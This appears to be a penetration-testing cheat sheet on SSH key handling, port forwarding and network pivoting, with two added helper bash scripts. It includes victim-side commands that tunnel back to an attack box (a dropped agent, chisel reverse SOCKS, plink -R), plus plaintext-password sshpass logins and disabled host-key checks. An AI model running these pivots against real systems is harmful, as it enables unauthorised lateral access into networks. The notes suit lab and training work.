Random


Load all ssh keys into the agent

eval "$(ssh-agent -s)"; ssh-add ~/.ssh/id_rsa*
# the glob also matches id_rsa.pub; ssh-add refuses the .pub file with an error but the private keys still load

Check loaded keys (MD5 fingerprints, with the "MD5:" prefix stripped so they match what AWS and older tooling display)

ssh-add -L | ssh-keygen -l -E md5 -f - | awk '{print substr($2,5)}'
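Added example, not from the original notes: a bash helper that prints the SHA256 and MD5 fingerprint of every key in a file (the agent's ssh-add -L output saved to a file, or a server's authorized_keys) and looks a key up by either fingerprint form, so you can tell which loaded key a given server actually accepts. It assumes OpenSSH's ssh-keygen; the file paths in the usage comments are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): SHA256 and MD5 fingerprints for
# every public key in a file, plus a lookup by either fingerprint form.
# Assumes OpenSSH's ssh-keygen (the -E hash option exists since OpenSSH 6.8).
# Typical inputs: `ssh-add -L > agent.pub` (what the agent offers) or a server's
# ~/.ssh/authorized_keys (what the server accepts). Paths here are placeholders.
set -u

# fingerprint FILE HASH -> one line per key: "<TAG:fingerprint> <type> <comment>"
# HASH is sha256 or md5; the MD5:/SHA256: tag is kept so the two forms never get mixed up.
fingerprint() {
  ssh-keygen -l -E "$2" -f "$1" | awk '{
    comment = ""
    for (i = 3; i < NF; i++) comment = comment (i > 3 ? " " : "") $i
    print $2, $NF, comment
  }'
}

# find_key FILE FP -> prints the public key line in FILE whose fingerprint is FP.
# FP may be MD5 (colon-separated hex) or SHA256 (base64), with or without its tag;
# GitHub and modern sshd report SHA256, AWS and older tooling still show MD5.
# Exit status 1 if nothing matched. Keys are checked one line at a time so the
# matching line can be printed verbatim (e.g. to paste into authorized_keys).
find_key() {
  local file="$1" want="${2#MD5:}" hash=sha256 tmp line got
  want="${want#SHA256:}"
  case "$want" in *:*) hash=md5 ;; esac
  tmp=$(mktemp)
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    printf '%s\n' "$line" >"$tmp"
    got=$(ssh-keygen -l -E "$hash" -f "$tmp" 2>/dev/null | awk '{print $2}')
    got="${got#MD5:}"; got="${got#SHA256:}"
    if [ "$got" = "$want" ]; then
      printf '%s\n' "$line"
      rm -f "$tmp"
      return 0
    fi
  done <"$file"
  rm -f "$tmp"
  return 1
}

# Usage (placeholder paths):
#   ssh-add -L > /tmp/agent.pub
#   fingerprint /tmp/agent.pub md5              # same data as the ssh-add | ssh-keygen one-liner above
#   find_key ~/.ssh/authorized_keys SHA256:...  # which authorized key is this?
```

Lines in authorized_keys that carry option prefixes (command=, from=) are not parsed by ssh-keygen -l and are simply skipped by find_key.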

Retrieve Vagrant SSH information

vagrant ssh-config

# the password shows up in the process list and shell history; acceptable on a lab box, nowhere else
sshpass -p 'mypass' ssh user@_RHOST_

scp user@_RHOST_:/_RFILE_ _LFILE_

Do not touch the known_hosts file (skips host key verification entirely)

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" user@host
# this throws away the MITM protection host keys provide; use it for lab hosts that get rebuilt, not for anything real

ssh unable to negotiate - no matching key exchange method found

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc user@host

The same legacy boxes often also fail with "no matching host key type found"; re-enable ssh-rsa with -oHostKeyAlgorithms=+ssh-rsa (and -oPubkeyAcceptedAlgorithms=+ssh-rsa if you authenticate with an RSA key). OpenSSH 8.8+ disabled ssh-rsa signatures by default.

Send a command via ssh

sshpass -p Pass123 ssh user@host -t 'cd /dev/shm/; chmod +x agent; ./agent -connect 10.10.10.10:11601 -ignore-cert'
# -t forces a pty, which an interactive agent may need; drop it for plain one-shot commands

ssh user@host "ping vpnip"

Run ssh through a SOCKS5 proxy (a chisel or ssh -D listener, for example)

# sudo apt install ncat
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:8080 %h %p' user@host

We can also run scp through the ProxyCommand by putting it in ~/.ssh/config:

# ~/.ssh/config

Host 10.4.215.215
        ProxyCommand ncat --proxy-type socks5 --proxy 127.0.0.1:5000 %h %p

then the command is simply

scp chisel_exercise_client user@10.4.215.215:/tmp/chisel_exercise_client

Fix "SSH Too Many Authentication Failures"

# The agent offers every loaded key in turn and the server's MaxAuthTries (default 6) runs out before the right one.
# IdentitiesOnly forces ssh to use only the identity files given on the command line (or in ssh_config):
ssh -o IdentitiesOnly=yes -i ~/.ssh/the_right_key user@host

Login with a key

chmod 600 id_rsa        # 400 works too; ssh refuses a key readable by others ("UNPROTECTED PRIVATE KEY FILE")
ssh -i id_rsa user@host
ssh <user>@<ip> -i <private key>

Generate a key and install it on a target

ssh-keygen -t rsa -b 4096
cat id_rsa.pub | pbcopy                          # macOS clipboard; on Linux use xclip -selection clipboard
echo "SSH key data" >> ~/.ssh/authorized_keys    # on the target, as the user you want to log in as
# sshd (StrictModes, the default) ignores authorized_keys if ~/.ssh or the file is group- or world-writable: 700 on the directory, 600 on the file

Find machines hidden behind the victim

kali => victim machine => hidden machine

List the forwards already set up on the victim (lab-specific script path from the exercise)

sudo cat /root/port_forwarding_and_tunneling/ssh_local_port_forwarding.sh

Check which networks the victim is attached to (ip route and ip neigh add the routes and ARP neighbours, which is where the hidden hosts show up)

ip a

rinetd Port Forwarding

local:80 => 212.12.12.1:80

# /etc/rinetd.conf, one forward per line: bindaddress bindport connectaddress connectport
0.0.0.0 80 212.12.12.1 80
# restart rinetd after editing (sudo service rinetd restart)

verify rinetd is listening

ss -antp | grep ":80 "

SSH Tunneling

-f backgrounds ssh once the forward is up and -N runs no remote command; together (-fN) they give a detached tunnel. Add -o ExitOnForwardFailure=yes so ssh fails instead of sitting idle in the background when the local port is already taken.

Local forward (kali to victim): a port on kali reaches something the victim can see

ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER

ssh -N -L 1234:127.0.0.1:80 user@victim          # kali:1234 -> the victim's own 127.0.0.1:80

ssh -N -L [my_address:]my_port:victim_host:victim_port [user@address]

Remote forward (from victim to kali): a port on kali, the ssh server here (10.11.0.4), reaches something the victim can see

ssh -R [SERVER_BIND_IP:]SERVER_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER

$(in victim) ssh -N -R 10.11.0.4:3306:127.0.0.1:8080 kali@10.11.0.4    # kali 10.11.0.4:3306 -> the victim's 127.0.0.1:8080
# DESTINATION is resolved on the victim. Binding anything but localhost on kali needs GatewayPorts yes (or clientspecified) in kali's sshd_config, otherwise sshd silently binds 127.0.0.1 instead.

Dynamic forward: a SOCKS proxy on kali that sends any traffic out through the victim

$(in kali) ssh -N -D 127.0.0.1:8080 user@victim
sshpass -p "password" ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -D 1080 -N -C -f -q user@victim -p22
  • -D 1080: opens a SOCKS proxy (SOCKS4 and SOCKS5) on local port 1080
  • -f: requests ssh to go to the background itself once authenticated, just before command execution
  • -C: compresses data before sending it
  • -q: quiet mode, suppresses warnings and diagnostics
  • -N: does not execute a remote command, useful for just holding a forward open (protocol 2 only)
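Added example, not from the original notes: a bash helper that runs the three forward types above through an ssh control socket (-M/-S), so each tunnel can be checked and torn down by name instead of by hunting for a PID, and that validates the [bind:]port:host:port spec before ssh is even started. The names user@victim, kali@10.11.0.4, HIDDEN_IP and the socket directory are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): run ssh forwards through a control
# socket so each tunnel can be checked and torn down by name. Placeholders:
# user@victim, kali@10.11.0.4, HIDDEN_IP, the socket directory.
set -u

SOCK_DIR="${TMPDIR:-/tmp}/ssh-tunnels"

# valid_port N -> 0 if N is a decimal port in 1..65535
valid_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# valid_forward_spec SPEC -> 0 if SPEC looks like [bind:]port:host:port, the form
# -L and -R take. Runs in a subshell so the IFS and globbing changes do not leak
# (a bind address of '*' must stay literal). IPv6 literals are not handled.
valid_forward_spec() (
  spec="$1"
  set -f
  IFS=':'
  set -- $spec
  case $# in
    3) lport="$1"; host="$2"; rport="$3" ;;
    4) lport="$2"; host="$3"; rport="$4" ;;
    *) return 1 ;;
  esac
  [ -n "$host" ] && valid_port "$lport" && valid_port "$rport"
)

# tunnel_up NAME MODE SPEC TARGET [extra ssh args...]
#   MODE is -L, -R or -D; SPEC is the forward spec (just [bind:]port for -D).
# -f -N: background, no remote command.  -M -S: control master on a named socket.
# ExitOnForwardFailure: if the port is already taken ssh exits non-zero instead
# of sitting in the background carrying no forward at all.
tunnel_up() {
  local name="$1" mode="$2" spec="$3" target="$4"
  shift 4
  if [ "$mode" != "-D" ] && ! valid_forward_spec "$spec"; then
    echo "tunnel_up: bad forward spec '$spec'" >&2
    return 2
  fi
  mkdir -p "$SOCK_DIR"
  ssh -f -N -M -S "$SOCK_DIR/$name.sock" -o ExitOnForwardFailure=yes \
      "$mode" "$spec" "$@" "$target"
}

# tunnel_check NAME TARGET -> asks the control master whether the session is alive
tunnel_check() { ssh -S "$SOCK_DIR/$1.sock" -O check "$2"; }

# tunnel_down NAME TARGET -> closes the master and with it every forward it carries
tunnel_down()  { ssh -S "$SOCK_DIR/$1.sock" -O exit "$2"; }

# Usage (placeholders):
#   tunnel_up web -L 1234:127.0.0.1:80 user@victim          # on kali
#   tunnel_up db  -R 127.0.0.1:8080:HIDDEN_IP:3306 kali@10.11.0.4   # on the victim
#   tunnel_up px  -D 1080 user@victim -o StrictHostKeyChecking=no
#   tunnel_check px user@victim
#   tunnel_down  px user@victim
```

The -D tunnel pairs with proxychains: put "socks5 127.0.0.1 1080" in /etc/proxychains4.conf (/etc/proxychains.conf on older installs) and prefix tools that do not speak SOCKS themselves with proxychains.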

Chisel Tunneling

REMOTE (reverse): server on the attack box, the victim connects back to it, forwarded ports open on the attack box

Attack box

./chisel server -p LISTEN_PORT --reverse &

Victim host

./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
# R:socks opens a SOCKS5 proxy on the attack box, port 1080 by default; point proxychains or ssh's ProxyCommand at it

./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
# attack box LOCAL_PORT -> TARGET_IP:TARGET_PORT as reached from the victim

LOCAL: server on the victim, the attack box connects to it, the forwarded port opens on the attack box

Victim

./chisel server -p LISTEN_PORT

Attack box

./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT

Plink remote forward (Windows victim)

# needs sshd running on the attack box; "echo y" answers the host key prompt; KEYFILE must be a PuTTY .ppk (convert an OpenSSH key with puttygen)
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@attacker -i KEYFILE -N
# attack box :8000 -> 172.16.0.10:80 as reached from the Windows host